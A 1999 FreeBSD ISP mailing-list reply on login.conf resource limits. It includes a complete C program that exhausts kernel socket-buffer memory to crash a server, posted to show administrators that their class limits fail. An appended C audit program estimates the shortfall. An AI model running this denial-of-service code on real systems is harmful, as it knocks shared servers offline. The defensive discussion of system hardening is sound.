Date:      Thu, 4 Nov 1999 23:36:03 -0500 (EST)
From:      <up@3.am>
To:        Mike Tancsa <mike@sentex.net>
Cc:        freebsd-isp@freebsd.org
Subject:   Re: login.conf and resource limits
Message-ID:  <Pine.GSO.4.10.9911042331170.8377-100000@richard2.pil.net>
In-Reply-To: <38224635.260144868@mail.sentex.net>


I got news for you, that ain't going to stop the DoS.  Compile and run
this code as a user from your shellu class.  It will crash your server, so 
don't do it on a production box (BTW, I had checked the security list
archives and saw a thread on this, but no answers that worked):

#include        <stdlib.h>      /* exit() */
#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

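        /*
         * Data queued on each socketpair is held in kernel memory, which
         * the datasize/memoryuse limits of the login class do not count.
         */
        while (1)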
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));

                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}

On Fri, 5 Nov 1999, Mike Tancsa wrote:

> On 4 Nov 1999 21:00:01 -0500, in sentex.lists.freebsd.isp you wrote:
> 
> >
> >This is what I came up with after checking out the man pages and examples
> >in login.conf.  If someone who's addressed this has a good example default
> >config, that would be very helpful.
> 
> shellu:\
>         :cputime=infinity:\
>         :datasize-cur=8M:\
>         :datasize-max=8M:\
>         :stacksize-cur=4M:\
>         :stacksize-max=4M:\
>         :memorylocked-cur=10M:\
>         :memorylocked-max=10M:\
>         :memoryuse-cur=10M:\
>         :memoryuse-max=10M:\
>         :filesize=infinity:\
>         :coredumpsize=infinity:\
>         :maxproc-cur=5:\
>         :maxproc-max=5:\
>         :openfiles-cur=64:\
>         :openfiles-max=64:\
>         :priority=0:\
>         :requirehome@:\
>         :umask=022:\
>         :tc=auth-defaults:
> 
> is what I use for my casual shell users... Don't forget
> 
> cap_mkdb /etc/login.conf
> 
> 	---Mike
> Mike Tancsa  (mdtancsa@sentex.net)		
> Sentex Communications Corp,   		
> Waterloo, Ontario, Canada
> "Given enough time, 100 monkeys on 100 routers 
> could setup a national IP network." (KDW2)
> 

James Smallacombe		      PlantageNet, Inc. CEO and Janitor
up@3.am							    http://3.am
=========================================================================
ISPF 3 - The Forum for ISPs by ISPs(tm)  ||  Nov 15-17, 1999, New Orleans
3 days of clues, news, and views from the industry's best and brightest.
     Visit <http://www.ispf.com/> for information and registration.
=========================================================================
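
An added example, not part of the original message or of FreeBSD: a small audit of the quoted shellu class that compares its memoryuse limit with a rough upper bound on the socket buffer bytes the class can queue in the kernel (openfiles x maxproc x per-socket buffer, using the 204800-byte buffer from the program above). Assumptions: the class is given as a constructed one-line string, the kernel grants the requested buffer size, and `sbsize` (the login.conf(5) capability for per-user socket buffer memory, which does not appear in this thread) is honoured when present.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define CAP_ABSENT   (-1LL)
#define CAP_INFINITY (-2LL)

/* Constructed input: limits from the quoted shellu class, joined on one line. */
static const char SHELLU[] =
    "shellu:cputime=infinity:datasize-max=8M:memoryuse-max=10M:"
    "maxproc-max=5:openfiles-max=64:";

/* Value of capability `name`; only the k/m/g size suffixes are handled. */
long long cap_size(const char *entry, const char *name)
{
    char key[64], *end;
    const char *p;
    long long v;

    snprintf(key, sizeof key, ":%s=", name);
    if ((p = strstr(entry, key)) == NULL)
        return CAP_ABSENT;
    p += strlen(key);
    if (strncmp(p, "infinity", 8) == 0)
        return CAP_INFINITY;
    v = strtoll(p, &end, 10);
    switch (*end) {
    case 'G': case 'g': v *= 1024; /* FALLTHROUGH */
    case 'M': case 'm': v *= 1024; /* FALLTHROUGH */
    case 'K': case 'k': v *= 1024;
    }
    return v;
}

/* Rough upper bound on socket buffer bytes the class can queue in the kernel. */
long long sockbuf_bound(const char *entry, long long per_socket)
{
    long long sb = cap_size(entry, "sbsize");
    long long files = cap_size(entry, "openfiles-max");
    long long procs = cap_size(entry, "maxproc-max");

    if (sb >= 0)
        return sb;                  /* explicit per-user cap applies */
    return (files < 0 || procs < 0) ? CAP_INFINITY : files * procs * per_socket;
}

int main(void)
{
    printf("memoryuse-max=%lld bytes, socket buffer bound=%lld bytes\n",
           cap_size(SHELLU, "memoryuse-max"), sockbuf_bound(SHELLU, 204800));
    return 0;
}
```

For the quoted class the bound is several times the 10M memoryuse limit, because descriptor and process counts are capped but the kernel memory behind each socket is not.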


